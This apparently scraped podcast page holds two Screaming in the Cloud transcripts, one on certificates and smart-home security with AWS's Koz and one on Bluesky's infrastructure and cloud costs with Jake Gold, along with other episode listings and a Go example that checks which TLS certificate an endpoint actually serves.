For those listening who aren't sure what that is, it's a new end-all be-all smart home standard for defining devices in a protocol-independent way that lets your hubs talk to devices without needing drivers from each company to interact with them. And one of the things I love about it is every device needs a certificate to identify it. And so, private CA has been a great partner with Matter, you know, it goes well with it.In fact, we're one of the leading certificate authorities for Matter devices. Customers love the pricing and the way they can get started without talking to anybody. So yeah, I'm excited to see, you know, as a smart home junkie and as a PKI guy, I'm excited to see Matter take off. Right now I have a huge amalgamation of smart home devices at home and seeing them all go to Matter will be wonderful.Corey: Oh, it's fantastic. I am a little worried about aspects of this, though, where you have things that get access to the internet and then act as a bridge. So suddenly, like, I have an IoT subnet with some controls on it for obvious reasons and honestly, one of the things I despise the most in this world has been the rise of smart TVs because I just want you to be a big dumb screen. “Well, how are you going to watch your movies?” “With the Apple TV I've plugged into the thing. I just want you to be a screen. That's it.” So, I live a bit in fear of the day where these things find alternate ways to talk to the internet and, you know, report on what I'm watching.Koz: Yeah, I think Matter is going to help a lot with this because it's focused on local control. And so, you'll have to trust your hub, whether that's your TV or your Echo device or what have you, but they all communicate securely amongst themselves. They use certificates for identification, and they're building into Matter a robust revocation mechanism. You know, in my case at home, my TV's not connected to the internet because I use my Fire TV to talk to it, similar to your Apple TV situation. 
I want a device I control, not my TV, doing it. I'm happy with the big dumb screen.And I think, you know, what you're going to end up doing is saying there's a device out there you'll trust maybe more than others and say, “That's what I'm going to use as my hub for my Matter devices and that's what will speak to the internet,” and otherwise my Matter devices will talk directly to my hub.Corey: Yeah, there's very much a spectrum of trust. There's the, this is a Linux distribution on a computer that I installed myself and vetted and wound up contributing to at one point on the one end of the spectrum, and the other end of the spectrum of things you trust the absolute least in this world, which are, of course, printers. And most things fall somewhere in between.Koz: Yes, right now, it is a Wild West of rebranded white-label applications, right? You have all kinds of companies spitting out reference designs as products and white labeling the control app for it. And so, your phone starts collecting these smart home applications to control each one of these things because you buy different switches from different people. I'm looking forward to Matter collapsing that all down to having one application and one control model for all of the smart home devices.Corey: Wemo explicitly stated that they're not going to be pursuing this because it doesn't let them differentiate the experience. Read as, cash grab. I also found out that Wemo—which is, of course, a Belkin subsidiary—had a critical vulnerability in some of the light switches it offered, including the one built into the wall in this room—until a week ago—where they're not going to be releasing a patch for it because those are end-of-life. Really? Because I log into the Wemo app and the only way I would have known this has been the fact that it's been a suspiciously long time since there was a firmware update available for it. But that's it. 
Like, the only way I found this out was via a security advisory, at which point that got ripped out of the wall and replaced with something that isn't, you know, horrifying. But man did that bother me.Koz: Yeah. I think this is still an open issue for the smart home world.Corey: Every company wants a moat of some sort, but I don't want 15 different apps to manage this stuff. You turned me on to Home Assistant, which is an open-source, home control automation system and, on some level, the interface is very clearly built by a bunch of open-source people—good for them; they could benefit from a graphic designer or three to—or user experience person to tie it all together, but once you wrap your head around it, it works really well, where I have automations let me do different things. They even have an Apple Watch app [without its 00:32:14] complications on it. So, I can tap the thing and turn on the lights in my office to different levels if I don't want to talk to the robot that runs my house. And because my daughter has started getting very deeply absorbed into some YouTube videos from time to time, after the third time I asked her what—I call her name, I tap a different one and the internet dies to her iPad specifically, and I wait about 30 to 45 seconds, and she'll find me immediately.Koz: That's an amazing automation. I love Home Assistant. It's certainly more technical than I could give to my parents, for example, right now. I think things like Matter are going to bring a lot of that functionality to the easier-to-use hubs. And I think Home Assistant will get better over time as well.I think the only way to deal with these devices that are going to end-of-life and stop getting support is have them be local control only and so then it's your hub that keeps getting support and that's what talks to the internet. 
And so, you don't—you know, if there's a vulnerability in the TCP stack, for example, in your light switch, but your light switch only talks to the hub and isn't allowed to talk to anything else, how severe is that? I don't think it's so bad. Certainly, I wall off all of my IoT devices so that they don't talk to the rest of my network, but now you're getting a fairly complicated networking… mojo that listeners to your podcast are, I'm sure, capable of, but many people aren't.Corey: I had something that did something very similar and then I had to remove a lot of those restrictions to try to diagnose a phantom issue that it appears was an unreported bug in the wireless AP when you use its second Ethernet port as a bridge, where things would intermittently not be able to cross VLANs when passing through that. As in, the initial host key exchange for SSH would work and then it would stall and reset on both sides and it was a disaster. It was, what is going on here? And the answer was it was haunted. So, a small architecture change later, and the problem has not recurred. I need to reapply those restrictions.Koz: I mean, these are the kinds of things that just make me want to live in a shack in the woods, right? Like, I don't know how you manage something like that. Like, these are just pain points all over. I think over time, they'll get better, but until then, that shack in the woods with not even running water sounds pretty appealing.Corey: Yeah, at some level, having smart lights, for example, one of the best approaches that all the manufacturers I've seen have taken, it still works exactly as you would expect when you hit the light switch on the wall because that's something that you really need to make work or it turns out for those of us who don't live alone, we will not be allowed to smart home things anymore.Koz: Exactly. I don't have any smart bulbs in my house. 
They're all smart switches because I don't want to have to put tape over something and say, “Don't hit that switch.” And then watch one of my family members pull the tape off and hit the switch anyways.Corey: I have floor lamps with smart bulbs in them, but I wind up treating them all as one device. And I mean, I've taken the switch out from the root because it's, like, too many things to wind up slicing and dicing. But yeah, there's a scaling problem because right now a lot of this stuff—because Matter is not quite there—all winds up using either Zigbee—which is fine; I have no problem with that; it feels like it's becoming Matter quickly—or WiFi. And there is an upper bound to how many devices you want or can have on some fairly limited frequency.Koz: Yeah. I think this is still something that needs to be resolved. You know, I've got hundreds of devices in my house. Thankfully, most of them are not WiFi or Zigbee. But I think we're going to see this evolve over time and I'm excited for it.Corey: I was talking to someone where I was explaining that, well, how this stuff works. Like, “Well, how many devices could you possibly have on your home network?” And at the time it was about 70 or 80. And they just stared at me for the longest time. I mean, it used to be that I could name all the computers in my house. I can no longer do that.Koz: Sure. Well, I mean, every light switch ends up being a computer.Corey: And that's the weirdest thing is that it's, I'm used to computers, being a thing that requires maintenance and care and feeding and security patches and—yes, relevant to your work—an SSL certificate. It's like, so what does all of that fancy wizardry do? Well, when it receives a signal, it completes a circuit. The end. And it's, are we really better off for some of these things? 
There are days we wonder.Koz: Well, my light bill, my electric bill, is definitely better off having these smart switches because nobody in my house seems to know how to turn a light switch off. And so, having the house do it itself helps quite a bit.Corey: To be very clear, I would skewer you if you worked on an AWS service that actually charged money for anything for what you just said about the complaining about light bills and optimizing light bills and the rest—Koz: [laugh].Corey: —but I've never had to optimize your service's certificate bill beca—after you've spun off the one thing that charges—because you can't cost optimize free, as it turns out, and I've yet to find a way to the one optimization possible where now you start paying customers money. I'm sure there's a way to do that somewhere but damned if I can find it.Koz: Well, if you find a way to optimize free, please let me know and I'll share it with all of our customers.Corey: [laugh]. Isn't that the truth? I really want to thank you for taking the time to speak with me today. If people want to learn more, where's the best place for them to find you?Koz: I can give you the standard AWS answer.Corey: Yeah, www.aws.com. Yeah.Koz: Well, I would have said koz@amazon.com. I'm always happy to talk about certs and PKI. I find myself less active on social media lately. You can find me, I guess, on Twitter as @seakoz and on Bluesky as [kozolchyk.com 00:38:03].Corey: And we will put links to all of that in the [show notes 00:38:06]. Thank you so much for being so generous with your time. I appreciate it.Koz: Always happy, Corey.Corey: Jonathan Kozolchyk, or Koz as we all call him, general manager for Certificate Services at AWS. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. 
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry, insulting comment that then will fail to post because your podcast platform of choice has an expired security certificate.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.
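The closed-loop check Koz describes in the episode above, where the thing you alert on is the certificate an endpoint actually presents during the handshake rather than the file sitting on disk, as an added example written for this page. It is not AWS, ACM or Private CA code: the self-signed `issueCert` helper stands in for whatever CA feeds your issuance log, the hostname `svc.example.internal` is assumed, and the `127.0.0.1` listener that keeps serving the superseded certificate is a constructed stand-in for a fleet whose reload automation failed.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

type Status string

const (
	StatusCurrent  Status = "current"  // serving the newest cert in the issuance log
	StatusExpiring Status = "expiring" // newest cert, but inside the renewal window: renewal is late
	StatusStale    Status = "stale"    // serving an older cert we issued: the rollout did not take
	StatusUnknown  Status = "unknown"  // serving a cert that is not in the log at all
)

// Fingerprint is SHA-256 over the DER bytes, the key that ties a served cert to an issuance record.
func Fingerprint(c *x509.Certificate) string {
	sum := sha256.Sum256(c.Raw)
	return hex.EncodeToString(sum[:])
}

// issueCert stands in for the CA (assumption: a real log would come from ACM, Private CA or an ACME client).
func issueCert(name string, notBefore time.Time, lifetime time.Duration) (tls.Certificate, *x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(time.Now().UnixNano()),
		DNSNames:     []string{name},
		NotBefore:    notBefore,
		NotAfter:     notBefore.Add(lifetime),
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key) // self-signed leaf
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	leaf, err := x509.ParseCertificate(der)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}, leaf, err
}

// Classify compares the leaf an endpoint actually presented with the issuance log for that
// name (oldest first) and decides whether to alert.
func Classify(issued []*x509.Certificate, served *x509.Certificate, now time.Time, renewWindow time.Duration) Status {
	if len(issued) == 0 {
		return StatusUnknown
	}
	fp := Fingerprint(served)
	if fp == Fingerprint(issued[len(issued)-1]) {
		if now.Add(renewWindow).After(served.NotAfter) {
			return StatusExpiring
		}
		return StatusCurrent
	}
	for _, c := range issued[:len(issued)-1] {
		if Fingerprint(c) == fp {
			return StatusStale
		}
	}
	return StatusUnknown
}

// ServedLeaf handshakes with addr and returns the leaf seen on the wire, not the file on disk.
// Verification is skipped on purpose: a stale or unknown cert must be observed and reported.
func ServedLeaf(addr, serverName string) (*x509.Certificate, error) {
	conn, err := tls.Dial("tcp", addr, &tls.Config{ServerName: serverName, InsecureSkipVerify: true})
	if err != nil {
		return nil, err
	}
	defer conn.Close()
	return conn.ConnectionState().PeerCertificates[0], nil
}

func main() {
	now, day := time.Now(), 24*time.Hour
	oldTLS, oldLeaf, _ := issueCert("svc.example.internal", now.Add(-60*day), 90*day) // assumed hostname
	_, newLeaf, _ := issueCert("svc.example.internal", now, 90*day)
	// Constructed failure: a renewal was issued, but the endpoint still loads the old cert.
	ln, err := tls.Listen("tcp", "127.0.0.1:0", &tls.Config{Certificates: []tls.Certificate{oldTLS}})
	if err != nil {
		panic(err)
	}
	go func() { // answer exactly one handshake, the one the check below makes
		if c, err := ln.Accept(); err == nil {
			c.(*tls.Conn).Handshake()
			c.Close()
		}
	}()
	served, err := ServedLeaf(ln.Addr().String(), "svc.example.internal")
	if err != nil {
		panic(err)
	}
	fmt.Println(Classify([]*x509.Certificate{oldLeaf, newLeaf}, served, now, 30*day)) // stale
}
```

`go run` prints `stale`: a renewal exists in the log but the listener never picked it up, which is exactly the case a file-on-disk check misses. In a real deployment the log would be fed from the CA's issuance records, `ServedLeaf` would be run from the monitoring side against every listener for the name, and `stale`, `expiring` and `unknown` would each page the owning team; `unknown` is also the state that surfaces a certificate nobody authorised.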

Home Assistant Podcast
2023.7 – Home Assistant…Returns? Responds back?

Home Assistant Podcast

Jul 3, 2023 61:09


2023.7 brings in the biggest change to Home Assistant in 10 years. Rohan and Phil break it down along with all the other goodies. For complete show notes and more information about the topics discussed in this episode, be sure to check the notes at https://hasspodcast.io/ha135/ Watch this episode on YouTube. Support Rohan and Phil on Patreon. This episode was made possible thanks to our sponsor, Home Assistant Cloud by Nabu Casa: easily connect to Google and Amazon voice assistants for a small monthly fee that also supports the Home Assistant project. Configuration is via the user interface, so no fiddling with router settings, dynamic DNS or YAML. Hosts: Phil Hawthorne (Website, Smart Home Products, Twitter: @philhawthorne, Buy Phil a Coffee); Rohan Karamandi (Website, Smart Home Products, Twitter: @rohank9, Buy Rohan a Coffee)

Think BIG Bodybuilding
Drugs N Stuff 191 STEROID QA

Think BIG Bodybuilding

Jul 3, 2023 47:40


DNS 191 Dave Crosland & Scott McNally TIME STAMPS BELOW

Self-Hosted
100: Our Essential Apps

Self-Hosted

Jun 30, 2023 49:55


We cover our must-have self-hosted apps, reflect on the state of Self-Hosting now, and discuss what's new in Proxmox 8.

Hemispheric Views
088: I Don't Like The Residue!

Hemispheric Views

Jun 29, 2023 54:13


It's a call-in show now?! Someone else fell into the trap of sending in a desk to be reviewed! More talk about Windows than you would ever imagine. Finally, a little reflection on the show and a board meeting to decide if we keep going! Podcast Shout-out! 00:00:00 Hi, Robb!

TBTL- Too Beautiful to Live
#3975 Domain Not Sweet

TBTL- Too Beautiful to Live

Jun 28, 2023 67:19


Andrew spent yesterday rescuing the new TBTL website from the maws of DNS hell, with a lot of help from his new best friend. Plus, it looks like Wheel of Fortune has a new host lined up, but you'll have to listen to today's episode to find out if it's Ryan Seacrest.

TBTL- Too Beautiful to Live
#3975 Domain Not Sweet

TBTL- Too Beautiful to Live

Jun 27, 2023 67:27


Andrew spent yesterday rescuing the new TBTL website from the maws of DNS hell, with a lot of help from his new best friend. Plus, it looks like Wheel of Fortune has a new host lined up, but you'll have to listen to today's episode to find out if it's Ryan Seacrest.

Screaming in the Cloud
Building Reliable Open-Source Social Media with Jake Gold

Screaming in the Cloud

Jun 27, 2023 37:45


Jake Gold, Infrastructure Engineer at Bluesky, joins Corey on Screaming in the Cloud to discuss his experience helping to build Bluesky and why he's so excited about it. Jake and Corey discuss the major differences when building a truly open-source social media platform, and Jake highlights his focus on reliability. Jake explains why he feels downtime can actually be a huge benefit to reliability engineers, and how he views abstractions based on the size of the team he's working on. Corey and Jake also discuss whether cloud is truly living up to its original promise of lowered costs.
About Jake: Jake Gold leads infrastructure at Bluesky, where the team is developing and deploying the decentralized social media protocol, ATP. Jake has previously managed infrastructure at companies such as Docker and Flipboard, and most recently, he was the founding leader of the Robot Reliability Team at Nuro, an autonomous delivery vehicle company.
Links Referenced: Bluesky: https://blueskyweb.xyz/ Bluesky waitlist signup: https://bsky.app
Transcript
Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. In case folks have missed this, I spent an inordinate amount of time on Twitter over the last decade or so, to the point where my wife, my business partner, and a couple of friends all went in over the holidays and got me a leather-bound set of books titled The Collected Works of Corey Quinn. It turns out that I have over a million words of shitpost on Twitter. 
If you've also been living in a cave for the last year, you'll notice that Twitter has basically been bought and driven into the ground by the world's saddest manchild, so there's been a bit of a diaspora as far as people trying to figure out where community lives.Jake Gold is an infrastructure engineer at Bluesky—which I will continue to be mispronouncing as Blue-ski because that's the kind of person I am—which is, as best I can tell, one of the leading contenders, if not the leading contender to replace what Twitter was for me. Jake, welcome to the show.Jake: Thanks a lot, Corey. Glad to be here.Corey: So, there's a lot of different angles we can take on this. We can talk about the policy side of it, we can talk about social networks and things we learn watching people in large groups with quasi-anonymity, we can talk about all kinds of different nonsense. But I don't want to do that because I am an old-school Linux systems administrator. And I believe you came from the exact same path, given that as we were making sure that I had, you know, the right person on the show, you came into work at a company after I'd left previously. So, not only are you good at the whole Linux server thing; you also have seen exactly how good I am not at the Linux server thing.Jake: Well, I don't remember there being any problems at TrueCar, where you worked before me. But yeah, my background is doing Linux systems administration, which turned into, sort of, Linux programming. And these days, we call it, you know, site reliability engineering. But yeah, I discovered Linux in the late-90s, as a teenager and, you know, installing Slackware on 50 floppy disks and things like that. And I just fell in love with the magic of, like, being able to run a web server, you know? I got a hosting account at, you know, my local ISP, and I was like, how do they do that, right?And then I figured out how to do it. 
I ran Apache, and it was like, still one of my core memories of getting, you know, httpd running and being able to access it over the internet and telling my friends on IRC. And so, I've done a whole bunch of things since then, but that's still, like, the part that I love the most.Corey: The thing that continually surprises me is just what I think I'm out and we've moved into a fully modern world where oh, all I do is I write code anymore, which I didn't realize I was doing until I realized if you call YAML code, you can get away with anything. And I get dragged—myself getting dragged back in. It's the falling back to fundamentals in these weird moments of yes, yes, immutable everything, Infrastructure is code, but when the server is misbehaving and you want to log in and get your hands dirty, the skill set rears its head yet again. At least that's what I've been noticing, at least as far as I've gone down a number of interesting IoT-based projects lately. Is that something you experience or have you evolved fully and not looked back?Jake: Yeah. No, what I try to do is on my personal projects, I'll use all the latest cool, flashy things, any abstraction you want, I'll try out everything, and then what I do it at work, I kind of have, like, a one or two year, sort of, lagging adoption of technologies, like, when I've actually shaken them out in my own stuff, then I use them at work. But yeah, I think one of my favorite quotes is, like, “Programmers first learn the power of abstraction, then they learn the cost of abstraction, and then they're ready to program.” And that's how I view infrastructure, very similar thing where, you know, certain abstractions like container orchestration, or you know, things like that can be super powerful if you need them, but like, you know, that's generally very large companies with lots of teams and things like that. And if you're not that, it pays dividends to not use overly complicated, overly abstracted things. 
And so, that tends to be [where 00:04:22] I follow up most of the time.Corey: I'm sure someone's going to consider this to be heresy, but if I'm tasked with getting a web application up and running in short order, I'm putting it on an old-school traditional three-tier architecture where you have a database server, a web server or two, and maybe a job server that lives between them. Because is it the hotness? No. Is it going to be resume bait? Not really.But you know, it's deterministic as far as where things live. When something breaks, I know where to find it. And you can miss me with the, “Well, that's not webscale,” response because yeah, by the time I'm getting something up overnight, to this has to serve the entire internet, there's probably a number of architectural iterations I'm going to be able to go through. The question is, what am I most comfortable with and what can I get things up and running with that's tried and tested?I'm also remarkably conservative on things like databases and file systems because mistakes at that level are absolutely going to show. Now, I don't know how much you're able to talk about the Blue-ski infrastructure without getting yelled at by various folks, but how modern versus… reliable—I guess that's probably a fair axis to put it on: modernity versus reliability—where on that spectrum, does the official Blue-ski infrastructure land these days?Jake: Yeah. So, I mean, we're in a fortunate position of being an open-source company working on an open protocol, and so we feel very comfortable talking about basically everything. Yeah, and I've talked about this a bit on the app, but the basic idea we have right now is we're using AWS, we have auto-scaling groups, and those auto-scaling groups are just EC2 instances running Docker CE—the Community Edition—for the runtime and for containers. 
And then we have a load balancer in front and a Postgres multi-AZ instance in the back on RDS, and it is really, really simple.And, like, when I talk about the difference between, like, a reliability engineer and a normal software engineer is, software engineers tend to be very feature-focused, you know, they're adding capabilities to a system. And the goal and the mission of a reliability team is to focus on reliability, right? Like, that's the primary thing that we're worried about. So, what I find to be the best resume builder is that I can say with a lot of certainty that if you talk to any teams that I've worked on, they will say that the infrastructure I ran was very reliable, it was very secure, and it ended up being very scalable because you know, the way we solve the, sort of, integration thing is you just version your infrastructure, right? And I think this works really well.You just say, “Hey, this was the way we did it now and we're going to call that V1. And now we're going to work on V2. And what should V2 be?” And maybe that does need something more complicated. Maybe you need to bring in Kubernetes, you maybe need to bring in a super-cool reverse proxy that has all sorts of capabilities that your current one doesn't.Yeah, but by versioning it, you just—it takes away a lot of the, sort of, interpersonal issues that can happen where, like, “Hey, we're replacing Jake's infrastructure with Bob's infrastructure or whatever.” I just say it's V1, it's V2, it's V3, and then I find that solves a huge number of the problems with that sort of dynamic. But yeah, at Bluesky, like, you know, the big thing that we are focused on is federation is scaling for us because the idea is not for us to run the entire global infrastructure for AT Proto, which is the protocol that Bluesky is based on. The idea is that it's this big open thing like the web, right? 
Like, you know, Netscape popularized the web, but they didn't run every web server, they didn't run every search engine, right, they didn't run all the payment stuff. They just did all of the core stuff, you know, they created SSL, right, which became TLS, and they did all the things that were necessary to make the whole system large, federated, and scalable. But they didn't run it all. And that's exactly the same goal we have.Corey: The obvious counterexample is, no, but then you take basically their spiritual successor, which is Google, and they build the security, they build—they run a lot of the servers, they have the search engine, they have the payments infrastructure, and then they turn a lot of it off for fun and… I would say profit, except it's the exact opposite of that. But I digress. I do have a question for you that I love to throw at people whenever they start talking about how their infrastructure involves auto-scaling. And I found this during the pandemic in that a lot of people believed in their heart-of-hearts that they were auto-scaling, but people lie, mostly to themselves. And you would look at their daily or hourly spend of their infrastructure and their user traffic dropped off a cliff and their spend was so flat you could basically eat off of it and set a table on top of it. If you pull up Cost Explorer and look through your environment, how large are the peaks and valleys over the course of a given day or week cycle?Jake: Yeah, no, that's a really good point. I think my basic approach right now is that we're so small, we don't really need to optimize very much for cost, you know? We have this sort of base level of traffic and it's not worth a huge amount of engineering time to do a lot of dynamic scaling and things like that. The main benefit we get from auto-scaling groups is really just doing the refresh to replace all of them, right? 
So, we're also doing the immutable server concept, right, which was popularized by Netflix.

And so, that's what we're really getting from auto-scaling groups. We're not even doing dynamic scaling, right? So, it's not keyed to some metric, you know, the number of instances that we have at the app server layer. But the cool thing is, you can do that when you're ready for it, right? The big issue is, you know, okay, you're scaling up your app instances, but is your database scaling up, right, because there's not a lot of use in having a whole bunch of app servers if the database is overloaded? And that tends to be the bottleneck for, kind of, any complicated kind of application like ours. So, right now, the bill is very flat; you could eat off, and—if it wasn't for the CDN traffic and the load balancer traffic and things like that, which are relatively minor.

Corey: I just want to stop for a second and marvel at just how educated that answer was. It's, I talk to a lot of folks who are early-stage who come and ask me about their AWS bills and what sort of things should they concern themselves with, and my answer tends to surprise them, which is, “You almost certainly should not unless things are bizarre and ridiculous. You are not going to build your way to your next milestone by cutting costs or optimizing your infrastructure.” The one thing that I would make sure to do is plan for a future of success, which means having account segregation where it makes sense, having tags in place so that when, “Huh, this thing's gotten really expensive. What's driving all of that?” Can be answered without a six-week research project attached to it.

But those are baseline AWS Hygiene 101. How do I optimize my bill further, usually the right answer is go build. Don't worry about the small stuff. What's always disturbing is people have that perspective and they're spending $300 million a year.
But it turns out that not caring about your AWS bill was, in fact, a zero interest rate phenomenon.

Jake: Yeah. So, we do all of those basic things. I think I went a little further than many people would where every single one of our—so we have different projects, right? So, we have the big graph server, which is sort of like the indexer for the whole network, and we have the PDS, which is the Personal Data Server, which is, kind of, where all of people's actual social data goes, your likes and your posts and things like that. And then we have a dev staging, sandbox, prod environment for each one of those, right? And there's more services besides. But the way we have it is those are all in completely separated VPCs with no peering whatsoever between them. They are all on distinct IP addresses, IP ranges, so that we could do VPC peering very easily across all of them.

Corey: Ah, that's someone who's done data center work before with overlapping IP address ranges and swore, never again.

Jake: Exactly. That is when I had been burned. I have cleaned up my mess and other people's messes. And there's nothing less fun than renumbering a large complicated network. But yeah, so once we have all these separate VPCs and so it's very easy for us to say, hey, we're going to take this whole stack from here and move it over to a different region, a different provider, you know?

And the other thing is that we're doing is, we're completely cloud agnostic, right? I really like AWS, I think they are the… the market leader for a reason: they're very reliable. But we're building this large federated network, so we're going to need to place infrastructure in places where AWS doesn't exist, for example, right? So, we need the ability to take an environment and replicate it in wherever. And of course, they have very good coverage, but there are places they don't exist.
And that's all made much easier by the fact that we've had a very strong separation of concerns.

Corey: I always found it fun that when you had these decentralized projects that were invariably NFT or cryptocurrency-driven over the past, eh, five or six years or so, and then AWS would take a us-east-1 outage in a variety of different and exciting ways, and all these projects would go down hard. It's, okay, you talk a lot about decentralization for having hard dependencies on one company in one data center, effectively, doing something right. And it becomes a harder problem in the fullness of time. There is the counterargument, in that when us-east-1 is having problems, most of the internet isn't working, so does your offering need to be up and running at all costs? There are some people for whom that answer is very much, yes. People will die if what we're running is not up and running. Usually, a social network is not on that list.

Jake: Yeah. One of the things that is surprising, I think, often when I talk about this as a reliability engineer, is that I think people sometimes over-index on downtime, you know? They just, they think it's much bigger deal than it is. You know, I've worked on systems where there was credit card processing where you're losing a million dollars a minute or something. And like, in that case, okay, it matters a lot because you can put a real dollar figure on it, but it's amazing how a few of the bumps in the road we've already had with Bluesky have turned into, sort of, fun events, right?

Like, we had a bug in our invite code system where people were getting too many invite codes and it was sort of caused a problem, but it was a super fun event. We all think back on it fondly, right? And so, outages are not fun, but they're not life and death, generally. And if you look at the traffic, usually what happens is after an outage traffic tends to go up.
And a lot of the people that joined, they're just, they're talking about the fun outage that they missed because they weren't even on the network, right?

So, it's like, I also like to remind people that eBay for many years used to have, like, an outage Wednesday, right? Whereas they could put a huge dollar figure on how much money they lost every Wednesday and yet eBay did quite well, right? Like, it's amazing what you can do if you relax the constraints of downtime a little bit. You can do maintenance things that would be impossible otherwise, which makes the whole thing work better the rest of the time, for example.

Corey: I mean, it's 2023 and the Social Security Administration's website still has business hours. They take a nightly four to six-hour maintenance window. It's like, the last person out of the office turns off the server or something. I imagine some horrifying mainframe job that needs to wind up sweeping after itself are running some compute jobs. But yeah, for a lot of these use cases, that downtime is absolutely acceptable.

I am curious as to… as you just said, you're building this out with an idea that it runs everywhere. So, you're on AWS right now because yeah, they are the market leader for a reason. If I'm building something from scratch, I'd be hard-pressed not to pick AWS for a variety of reasons. If I didn't have cloud expertise, I think I'd be more strongly inclined toward Google, but that's neither here nor there. But the problem is these large cloud providers have certain economic factors that they all treat similarly since they're competing with each other, and that causes me to believe things that aren't necessarily true.

One of those is that egress bandwidth to the internet is very expensive. I've worked in data centers. I know how 95th percentile commit bandwidth billing works. It is not overwhelmingly expensive, but you can be forgiven for believing that it is looking at cloud environments.
Today, Blue-ski does not support animated GIFs—however you want to mispronounce that word—they don't support embedded videos, and my immediate thought is, “Oh yeah, those things would be super expensive to wind up sharing.”

I don't know that that's true. I don't get the sense that those are major cost drivers. I think it's more a matter of complexity than the rest. But how are you making sure that the large cloud provider economic models don't inherently shape your view of what to build versus what not to build?

Jake: Yeah, no, I kind of knew where you're going as soon as you mentioned that because anyone who's worked in data centers knows that the bandwidth pricing is out of control. And I think one of the cool things that Cloudflare did is they stopped charging for egress bandwidth in certain scenarios, which is kind of amazing. And I think it's—the other thing that a lot of people don't realize is that, you know, these network connections tend to be fully symmetric, right? So, if it's a gigabit down, it's also a gigabit up at the same time, right? There's two gigabits that can be transferred per second.

And then the other thing that I find a little bit frustrating on the public cloud is that they don't really pass on the compute performance improvements that have happened over the last few years, right? Like computers are really fast, right? So, if you look at a provider like Hetzner, they're giving you these monster machines for $128 a month or something, right? And then you go and try to buy that same thing on the public, the big cloud providers, and the equivalent is ten times that, right? And then if you add in the bandwidth, it's another multiple, depending on how much you're transferring.

Corey: You can get Mac Minis on EC2 now, and you do the math out and the Mac Mini hardware is paid for in the first two or three months of spinning that thing up. And yes, there's value in AWS's engineering and being able to map IAM and EBS to it.
In some use cases, yeah, it's well worth having, but not in every case. And the economics get very hard to justify for an awful lot of work cases.

Jake: Yeah, I mean, to your point, though, about, like, limiting product features and things like that, like, one of the goals I have with doing infrastructure at Bluesky is to not let the infrastructure be a limiter on our product decisions. And a lot of that means that we'll put servers on Hetzner, we'll colo servers for things like that. I find that there's a really good hybrid cloud thing where you use AWS or GCP or Azure, and you use them for your most critical things, you're relatively low bandwidth things and the things that need to be the most flexible in terms of region and things like that—and security—and then for these, sort of, bulk services, pushing a lot of video content, right, or pushing a lot of images, those things, you put in a colo somewhere and you have these sort of CDN-like servers. And that kind of gives you the best of both worlds. And so, you know, that's the approach that we'll most likely take at Bluesky.

Corey: I want to emphasize something you said a minute ago about CloudFlare, where when they first announced R2, their object store alternative, when it first came out, I did an analysis on this to explain to people just why this was as big as it was. Let's say you have a one-gigabyte file and it blows up and a million people download it over the course of a month. AWS will come to you with a completely straight face, give you a bill for $65,000 and expect you to pay it. The exact same pattern with R2 in front of it, at the end of the month, you will be faced with a bill for 13 cents rounded up, and you will be expected to pay it, and something like 9 to 12 cents of that initially would have just been the storage cost on S3 and the single egress fee for it.
The rest is there is no egress cost tied to it.

Now, is Cloudflare going to let you send petabytes to the internet and not charge you on a bandwidth basis? Probably not. But they're also going to reach out with an upsell and they're going to have a conversation with you. “Would you like to transition to our enterprise plan?” Which is a hell of a lot better than, “I got Slashdotted”—or whatever the modern version of that is—“And here's a surprise bill that's going to cost as much as a Tesla.”

Jake: Yeah, I mean, I think one of the things that the cloud providers should hopefully eventually do—I hope Cloudflare pushes them in this direction—is to start—the original vision of AWS when I first started using it in 2006 or whenever launched, was—and they said this—they said they're going to lower your bill every so often, you know, as Moore's law makes their bill lower. And that kind of happened a little bit here and there, but it hasn't happened to the same degree that you know, I think all of us hoped it would. And I would love to see a cloud provider—and you know, Hetzner does this to some degree, but I'd love to see these really big cloud providers that are so great in so many ways, just pass on the savings of technology to the customer so we'll use more stuff there. I think it's a very enlightened viewpoint is to just say, “Hey, we're going to lower the costs, increase the efficiency, and then pass it on to customers, and then they will use more of our services as a result.” And I think Cloudflare is kind of leading the way in there, which I love.

Corey: I do need to add something there—because otherwise we're going to get letters and I don't think we want that—where AWS reps will, of course, reach out and say that they have cut prices over a hundred times. And they're going to ignore the fact that a lot of these were a service you don't use in a region you couldn't find a map if your life depended on it now is going to be 10% less. Great.
But let's look at the general case, where from C3 to C4—if you get the same size instance—it cut the price by a lot. C4 to C5, somewhat. C5 to C6 effectively is no change. And now, from C6 to C7, it is 6% more expensive like for like.

And they're making noises about price performance is still better, but there are an awful lot of us who say things like, “I need ten of these servers to live over there.” That workload gets more expensive when you start treating it that way. And maybe the price performance is there, maybe it's not, but it is clear that the bill always goes down is not true.

Jake: Yeah, and I think for certain kinds of organizations, it's totally fine the way that they do it. They do a pretty good job on price and performance. But for sort of more technical companies—especially—it's just you can see the gaps there, where that Hetzner is filling and that colocation is still filling. And I personally, you know, if I didn't need to do those things, I wouldn't do them, right? But the fact that you need to do them, I think, says kind of everything.

Corey: Tired of wrestling with Apache Kafka's complexity and cost? Feel like you're stuck in a Kafka novel, but with more latency spikes and less existential dread by at least 10%? You're not alone.

What if there was a way to 10x your streaming data performance without having to rob a bank? Enter Redpanda. It's not just another Kafka wannabe. Redpanda powers mission-critical workloads without making your AWS bill look like a phone number.

